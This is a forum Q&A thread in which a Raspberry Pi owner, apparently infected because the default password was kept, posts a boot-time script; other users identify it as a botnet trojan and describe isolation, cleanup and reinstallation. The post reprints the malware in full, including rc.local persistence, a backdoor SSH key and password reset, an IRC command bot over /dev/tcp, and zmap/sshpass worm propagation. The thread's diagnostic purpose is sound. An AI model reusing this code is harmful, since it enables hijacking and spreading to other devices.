# rc.local and ssh problem while booting, endless process

Tags: raspbian, ssh, boot-issues, malware

Every time my headless raspberry pi Zero W (Raspbian Lite) with an hdmi display boots, I get the following endless output: 
[image]
[image: error output 2]

I tried restoring the content of rc.local and it did run fine for a few times but now its back at this state... Al other booting checks are "OK".

What is happening ?

**Update**: 
content of rc.local now (has been edited by the system..??)
`#!/bin/sh -e
/opt/pQZPfiwh
exit 0`

**Content of the script**

```
#!/bin/bash

    MYSELF=`realpath $0`
DEBUG=/dev/null
echo $MYSELF >> $DEBUG

if [ "$EUID" -ne 0 ]
then 
    NEWMYSELF=`mktemp -u 'XXXXXXXX'`
    sudo cp $MYSELF /opt/$NEWMYSELF
    sudo sh -c "echo '#!/bin/sh -e' > /etc/rc.local"
    sudo sh -c "echo /opt/$NEWMYSELF >> /etc/rc.local"
    sudo sh -c "echo 'exit 0' >> /etc/rc.local"
    sleep 1
    sudo reboot
else
TMP1=`mktemp`
echo $TMP1 >> $DEBUG

killall bins.sh
killall minerd
killall node
killall nodejs
killall ktx-armv4l
killall ktx-i586
killall ktx-m68k
killall ktx-mips
killall ktx-mipsel
killall ktx-powerpc
killall ktx-sh4
killall ktx-sparc
killall arm5
killall zmap
killall kaiten
killall perl

echo "127.0.0.1 bins.deutschland-zahlung.eu" >> /etc/hosts
rm -rf /root/.bashrc
rm -rf /home/pi/.bashrc

usermod -p \$6\$vGkGPKUr\$heqvOhUzvbQ66Nb0JGCijh/81sG1WACcZgzPn8A0Wn58hHXWqy5yOgTlYJEbOjhkHD0MRsAkfJgjU/ioCYDeR1 pi

mkdir -p /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1IdE8HDef7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsMO+qkHugKA5U22wEGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCVjBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B"  >> /root/.ssh/authorized_keys

echo "nameserver 8.8.8.8" >> /etc/resolv.conf
rm -rf /tmp/ktx*
rm -rf /tmp/cpuminer-multi
rm -rf /var/tmp/kaiten

cat > /tmp/public.pem <<EOFMARKER
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC/ihTe2DLmG9huBi9DsCJ90MJs
glv7y530TWw2UqNtKjPPA1QXvNsWdiLpTzyvk8mv6ObWBF8hHzvyhJGCadl0v3HW
rXneU1DK+7iLRnkI4PRYYbdfwp92nRza00JUR7P4pghG5SnRK+R/579vIiy+1oAF
WRq+Z8HYMvPlgSRA3wIDAQAB
-----END PUBLIC KEY-----
EOFMARKER

BOT=`mktemp -u 'XXXXXXXX'`

cat > /tmp/$BOT <<'EOFMARKER'
#!/bin/bash

SYS=`uname -a | md5sum | awk -F' ' '{print $1}'`
NICK=a${SYS:24}
while [ true ]; do

    arr[0]="ix1.undernet.org"
    arr[1]="ix2.undernet.org"
    arr[2]="Ashburn.Va.Us.UnderNet.org"
    arr[3]="Bucharest.RO.EU.Undernet.Org"
    arr[4]="Budapest.HU.EU.UnderNet.org"
    arr[5]="Chicago.IL.US.Undernet.org"
    rand=$[$RANDOM % 6]
    svr=${arr[$rand]}

    eval 'exec 3<>/dev/tcp/$svr/6667;'
    if [[ ! "$?" -eq 0 ]] ; then
            continue
    fi

    echo $NICK

    eval 'printf "NICK $NICK\r\n" >&3;'
    if [[ ! "$?" -eq 0 ]] ; then
            continue
    fi
    eval 'printf "USER user 8 * :IRC hi\r\n" >&3;'
    if [[ ! "$?" -eq 0 ]] ; then
        continue
    fi

    # Main loop
    while [ true ]; do
        eval "read msg_in <&3;"

        if [[ ! "$?" -eq 0 ]] ; then
            break
        fi

        if  [[ "$msg_in" =~ "PING" ]] ; then
            printf "PONG %s\n" "${msg_in:5}";
            eval 'printf "PONG %s\r\n" "${msg_in:5}" >&3;'
            if [[ ! "$?" -eq 0 ]] ; then
                break
            fi
            sleep 1
            eval 'printf "JOIN #biret\r\n" >&3;'
            if [[ ! "$?" -eq 0 ]] ; then
                break
            fi
        elif [[ "$msg_in" =~ "PRIVMSG" ]] ; then
            privmsg_h=$(echo $msg_in| cut -d':' -f 3)
            privmsg_data=$(echo $msg_in| cut -d':' -f 4)
            privmsg_nick=$(echo $msg_in| cut -d':' -f 2 | cut -d'!' -f 1)

            hash=`echo $privmsg_data | base64 -d -i | md5sum | awk -F' ' '{print $1}'`
            sign=`echo $privmsg_h | base64 -d -i | openssl rsautl -verify -inkey /tmp/public.pem -pubin`

            if [[ "$sign" == "$hash" ]] ; then
                CMD=`echo $privmsg_data | base64 -d -i`
                RES=`bash -c "$CMD" | base64 -w 0`
                eval 'printf "PRIVMSG $privmsg_nick :$RES\r\n" >&3;'
                if [[ ! "$?" -eq 0 ]] ; then
                    break
                fi
            fi
        fi
    done
done
EOFMARKER

chmod +x /tmp/$BOT
nohup /tmp/$BOT 2>&1 > /tmp/bot.log &
rm /tmp/nohup.log -rf
rm -rf nohup.out
sleep 3
rm -rf /tmp/$BOT

NAME=`mktemp -u 'XXXXXXXX'`

date > /tmp/.s

apt-get update -y --force-yes
apt-get install zmap sshpass -y --force-yes

while [ true ]; do
    FILE=`mktemp`
    zmap -p 22 -o $FILE -n 100000
    killall ssh scp
    for IP in `cat $FILE`
    do
        sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME  && echo $IP >> /opt/.r && sshpass -praspberry ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" &
        sshpass -praspberryraspberry993311 scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME  && echo $IP >> /opt/.r && sshpass -praspberryraspberry993311 ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" &
    done
    rm -rf $FILE
    sleep 10
done

fi
```

Comment: The default /etc/rc.local file will have very little in it.  Can you post the content of your /etc/rc.local file?

Comment: `#!/bin/sh -e
/opt/pQZPfiwh
exit 0`
the "opt" thing has been added by the system... very strange. This is the second time. Before I had just the default print ip commands.

Comment: I would recommend allowing the process to run independently.  So add a `&` after the program.  That way if there's an error in the script, it doesn't hang the boot process.

Comment: after the opt/ thing?

Comment: If you didn't install it, I would be very interested to see the contents of `/opt/pQZPfiwh`. zmap is an internet scanner. kaiten is a linux backdoor. I'd focus on determining whether this system has been compromised rather than trying to "fix" it. I'd also recommend checking any of your other systems on the same network, and proceeding very slowly before opening up anything to the internet.

Comment: Reference to  the hosts file entry: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/unix_pimine.a . You can see where it's adding a public key to root's ~/.ssh/authorized_hosts. Fascinating stuff. Looks like you were almost added to a botnet zombie horde. Check other systems.

Comment: I did not change the default password so I guess that's why. Or could it be from some application?

Comment: Well, that explains it. You didn't change the default password, it's trivial to identify a Raspberry Pi, the `pi` user and default password are well known, so once spotted, your RPi was a sitting duck. Use this as a learning experience! And do check any other connected machines. You may have invited the demons into your network by doing so.

Answer (score 1, accepted):

Zmap is an internet scanner. Kaiten is a linux backdoor. I'd isolate the system and check to see (or confirm) whether or not it has been compromised. I'd also urge you to check any other systems on the same network. If your system was exposed to the internet, additional information on how would be helpful. Also put the contents of `/opt/pQZPfiwh` into a pastebin if possible.

More [info on kaiten here](https://www.welivesecurity.com/2016/03/30/meet-remaiten-a-linux-bot-on-steroids-targeting-routers-and-potentially-other-iot-devices/).

TO EMPHASIZE: It looks like your system has been compromised. Isolate it from your network, and plan on re-installing rather than recovering it.

Comment: Ah, missed the details in the boot screen.  Good call on seeing the kaiten process.

Comment: Curious to see if OP opened up a web server running PHP to the wild.

Comment: okay, I use it on a secure university network (Wi-fi eduroam) and I have only been using SSH with my Mac to run some graphical python code on it.

Comment: In any case, you got lucky. It showed itself so you could detect it.

Comment: see my update the content of the file

Answer (score 1):

For what it's worth (if anyone still wants to know). I was hit by this trojan last night. I newly installed it (my first pi). It was late, I was tired. I Hooked up my pi to the internet with the ssh-port open through my router. But I forgot to change the original password of pi. So they could walk right in. From the times I noticed that it was done within the hour after I hooked it up. They must have bots scanning for poor new pies.

Normaly I turn password authorisation off and enter only with a key.

In my system  the file in /opts had the name 5fevb4Vg which is probably randomly generated. The content was exactly the same as @Tibbe posted (I checked).
The link @Hadyn suplied to this page of tobsan is still working. It is a very concise explanation of what the script does. I took the liberty of not panicing and revert al the damage it did.

I started with disabling the script, make it unexecutable, putting an exit at the start. Then I went to rc.local and deleted the code there. I killed a few processes that I thought were related (pstree helped), but there was still communication running from which I could not pinpoint where it came from. This was clear from the fact that the file /tmp/bot.log was still being written. Of course it was very important to delete this key-access they put in /root/.ssh/keys-allowed. And then I rebooted. That worked and as far as I can see there is no more spy on my pi.

I checked my auth.log to verify. These were not me:

```
Oct 31 02:15:02 rpi sshd[1103]: Accepted password for pi from 193.201.224.158 port 27064 ssh2
Oct 31 05:20:02 rpi sshd[2799]: Accepted password for pi from 93.108.136.187 port 37478 ssh2
Oct 31 05:20:04 rpi sshd[2835]: Accepted password for pi from 93.108.136.187 port 37914 ssh2
```

At 05:20 hrs was this program installed. Three seconds later is the reboot you see in the script, etc. Anyway stupid me. Always change that default password right away. They are on you like flies.

Answer (score 0):

/opt is the location for optional software.  Raspbian does come with a few things in /opt, but all of them have nice names.

/opt/pQZPfiwh doesn't look like it's part of Raspbian, but something that has been installed afterward, and a component is trying to add it into rc.local.

- I would want to know what the software is.  Did this begin after you installed something new?  I'm suspicious of names that appear to be obfuscated.  If you can't find it, it would probably be worth reinstalling the image from scratch.
- Only *after* you find out what it is and determine that it's okay, you can try to workaround the boot issue by appending a `&` to the line in rc.local.

Answer (score 0):

Check this analysis here https://www.tobsan.se/update/2017/11/06/rpi-trojan.html

I've just had this installed on my RPI also with the default "pi" password , on 4 Jun 2018. So its still active. Exactly the same public key.

Comment: Thanks for your answer but we are looking for comprehensive answers that provide some explanation and context. Very short answers cannot do this, so please edit your answer to explain why it is right. Additionally, we prefer answers to be self contained where possible. Links [tend to rot](https://en.wikipedia.org/wiki/Link_rot) so answers which rely on a link can be rendered useless if the linked to content disappears. If you add more context from the link, it is more likely that people will find your answer useful.